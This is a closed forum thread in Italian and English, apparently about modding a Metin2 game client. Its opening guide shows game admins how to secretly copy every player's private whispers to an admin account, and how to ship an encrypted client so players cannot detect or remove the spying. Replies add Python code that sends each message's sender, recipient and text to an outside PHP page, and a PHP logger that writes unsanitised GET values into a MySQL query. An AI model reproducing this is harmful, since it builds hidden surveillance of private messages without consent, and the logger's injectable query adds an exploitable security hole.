Unmantained Guida [NEW-MOD FOR GAs]Spy the players

Una guida contrassegnata come Unmantained contiene informazioni su un argomento obsoleto, non più utile o files non aggiornati da parte del creatore.
Stato
Discussione chiusa ad ulteriori risposte.

Kayle

Utente Jade
9 Ottobre 2009
1,919
98
287
694
Ultima modifica da un moderatore:

IT:
Ciao a tutti, adesso spiegherò un nuovo modo ai ga per spiare le chat dei player.
Il tutto è molto semplice, ma non penso sia legale, dato che si viola la legge sulla privacy.
Questa idea non è mia, ma di Giulio, Exsta, che l'ha fatta prima di me, ma io ho capito come farlo e ho deciso di postarlo.

Come fare:
1. Scompattate root.epk (o exst.epk o pill.epk).
2. Aprite il file uiwhisper.py
3. Sostituite
PHP:
def SendWhisper(self):

text = self.chatLine.GetText()
		textLength = len(text)

if textLength > 0:
			if net.IsInsultIn(text):
				chat.AppendChat(chat.CHAT_TYPE_INFO, locale.CHAT_INSULT_STRING)
				return

net.SendWhisperPacket(self.targetName, text)

self.chatLine.SetText("")

chat.AppendWhisper(chat.WHISPER_TYPE_CHAT, self.targetName, player.GetName() + " : " + text)

con
Se volete che ricevete OGNI messaggio:
http://s4lv0dm.altervista.org/guide/whisper_it.txt

Se volete che ricevete solo i messaggi con insulti (dovete avere l'insult.txt ben fatto):
http://s4lv0dm.altervista.org/guide/whisper_insult_it.txt

4. In [GA]Nome, mettete il nome del GA che deve ricevere tutti i messaggi
5. Adesso salvate il file e ricompilate root.epk.

N.B:
Voi potete spiare le conversazioni degli altri SOLO se tutti hanno questa mod, quindi dovreste rilasciare il client così in questo modo, e poi anche cryptarlo, per evitare che i player sappiano/modifichino questa opzione.

Non mi assumo nessuna responsabilità sull'uso fatto di questa mod.

EN:

Hi guys, now I teach you how to spy the player's chat.
All is very simple, but I think that it isn't very legal.
This idea isn't mine, but of Giulio, Exsta. He created this, but i understand how to make it and i decided to post it.

HowTo:
1. Extract root.epk
2. Open the uiwhisper.py file
4. Replace
PHP:
def SendWhisper(self):

text = self.chatLine.GetText()
		textLength = len(text)

if textLength > 0:
			if net.IsInsultIn(text):
				chat.AppendChat(chat.CHAT_TYPE_INFO, locale.CHAT_INSULT_STRING)
				return

net.SendWhisperPacket(self.targetName, text)

self.chatLine.SetText("")

chat.AppendWhisper(chat.WHISPER_TYPE_CHAT, self.targetName, player.GetName() + " : " + text)

with

If you want that the GAs read ALL messages:
http://s4lv0dm.altervista.org/guide/whisper_en.txt

If you want that the GAs read ONLY the messages that contain insults:
http://s4lv0dm.altervista.org/guide/whisper_insult_en.txt

4. Replace [GA]Name with the GA's name.
5. Now save the files and compile root.epk.

Please Note:
You can spy the conversations of others, ONLY if all players have this mod, so you should post a client, and after crypt it, if not, the players can remove/edit it :)

I do not assume any responsibility for any use made of this mod.
PS: Sorry for by bad english, I am italian <.<

DevilHunteR,
Game Files Open © Team

non penso che funge, visto che è solo in client side quindi al posto del ga potrei mettere Reizan, non avrebbe tanto senso

ma i pm che vanno al ga sono tutti quelli fatti dai player o solo quelli che sono fatti nel momento incui il ga è on?

Non hai finito di leggere:
Codice:
Voi potete spiare le conversazioni degli altri SOLO se tutti hanno questa mod, quindi dovreste rilasciare il client così in questo modo, e poi anche cryptarlo, per evitare che i player sappiano/modifichino questa opzione.
Devi rilasciare il client con questo, seno è logico che non funge

ma i pm che vanno al ga sono tutti quelli fatti dai player o solo quelli che sono fatti nel momento incui il ga è on?
Il ga deve essere on, seno non riceve, in pratica riceve un messaggio con scritto:
Da: Mittente, Per: Destinatario : Messaggio
cioè
Da: Pincopallino Per: Pincopallone: Pincopalliamo?

Abbastanza Utile ;)
Ma il +1 te lo do ugualmente, perchè sei uno dei pochi che condivide tutto con la community ;) BRAVO!

P.S. Devi dare un pò di rep in giro prima di darla......
Te la do il prima possibile ;)

Per renderlo ottimale, bastarebbe fare che pinga una pagina PHP e scriva la il NomePg, Data, Ora, e Testo del PVP; ( é Molto facile )
In modo che se uno anche volesse denunciare* offese ricevute in PM potrebbe farlo avendo una quasi totale siurezza sul fatto che il tutto ( prove ) sono reperibili..

Per renderlo ottimale, bastarebbe fare che pinga una pagina PHP e scriva la il NomePg, Data, Ora, e Testo del PVP; ( é Molto facile )
In modo che se uno anche volesse denunciare* offese ricevute in PM potrebbe farlo avendo una quasi totale siurezza sul fatto che il tutto ( prove ) sono reperibili..
Si, quando si ricevono (o si inviano) messaggi, va ad una pagina php cioè questa:
http://prova.lol/gen.php?Dest=NomeD...saggio=Messaggio&Ora=Ora&Data=Data&Text=Testo

Non dovrebbe essere affatto difficile, anche se io che non conosco il python non so come prendere ora o data.
Magari quando ho tempo potrei farlo, non mi sembra difficile, la parte php forse è anche la più facile

Ottima idea comunque :)

Ultima modifica:
Non dovrebbe essere affatto difficile, anche se io che non conosco il python non so come prendere ora o data.

E perchè lo dovresti fare in Python?

Potresti semplicemente farlo in PHP:

PHP:
$time_offset ="CEST"; // Zona Europea
$time_a = ($time_offset * 120);
$time = date("h:i:s",time() + $time_a); / Prendi alla fine questo cm variabile, ed ha Ora, Min, Sec ;)
$today = date("j"); ( Prende il giorno corrente ) 
$mese = date("m"); ( Prende il mese nel formato 01 a 12 ) 
$anno= date("Y"); ( Prende anno ( non metto apostrofo pper evitare comm ) )
$datacompleta = "Data: " . $mese . "|" .  $today. "|". $anno .  " --  Ore: " . $time ;
  'Conta che potevi farlo pure su di un rigo, ma io preferivo cosi per poi dichiarare lavariabile con delle stringhe prestabilite da me
Saluti, Dragon

E perchè lo dovresti fare in Python?

Potresti semplicemente farlo in PHP:

PHP:
$time = date("h:i:s",time() + $time_a); / Prendi alla fine questo cm variabile, ed ha Ora, Min, Sec ;)
$today = date("j"); ( Prende il giorno corrente ) 
$mese = date("m"); ( Prende il mese nel formato 01 a 12 ) 
$anno= date("Y"); ( Prende anno ( non metto apostrofo pper evitare comm ) )
$datacompleta = "Data: " . $mese . "|" .  $today. "|". $anno .  " --  Ore: " . $time ;
  'Conta che potevi farlo pure su di un rigo, ma io preferivo cosi per poi dichiarare lavariabile con delle stringhe prestabilite da me
Saluti, Dragon
E che hai fatto? <.<
Io intendo che quando invia un messaggio automaticamente si apre quella pagina php con quei get che ho detto prima, e poi il tutto si può anche registrare nel database, oppure in un file di testo.

Cristo lol
TE hai detto " Non dovrebbe essere affatto difficile, anche se io che non conosco il python non so come prendere ora o data!"
E io ti ho detto che lo puoi fare con il source sopra in Php, e nalla pagina "Dest" dove ci sono i get aggiungi poi tra i vari valori che prendi ( Nome pers ecc ) pure data e ora letti dallo script, che è come averlo fatto in Python....

Ecco fatto: qui c'è la pagina in php:
PHP:
<?php
	$time = date("h:i:s",time() + $time_a); 
	$total_date = date("j/m/Y");
	$mittente = $_GET['mitt'];
	$destinatario = $_GET['dest'];
	$mess =  $_GET['mess'];
	$ip = "IPSERVER";
	$user = "root";
	$psw = "PASSWORD";
	mysql_connect($ip, $user, $psw);
	mysql_select_db(player);
	$query = mysql_query("INSERT INTO whisper VALUES(NULL, $mittente, $destinatario, $mess, '$date-$time');");
?>
e poi in python faccio una cosa del genere (gli import li metto all'inizio, ovvio) e quello sempre in quel def.
PHP:
import urllib
import webbrowser
apri = urllib.urlopen("http://sito.it/patate.php?mitt="+player.GetName()+"&dest="+self.targetName+"&mess="+text)
webbrowser.open(apri)
A dir la verità non so se lo fa in background, ma penso di no

Da come sono stato informato, aprendo sempre una pagina web ad ogni messaggio, rallenterebbe totalmente l'invio del messaggio, a questo punto tanto vale fare così
(Ovvio che scherzo):

Compri un server windows
Metti che tutti inviano ad un certo nick + scelto
Apri il client di metin
Modifichi l'evento onrecvwhisper solo in quel client e metti che si connette a quella pagina che fa la query
Logghi nel server windows con quel nick.

Ho scelto il metodo più "economico" :sisi: <.<

Stato
Discussione chiusa ad ulteriori risposte.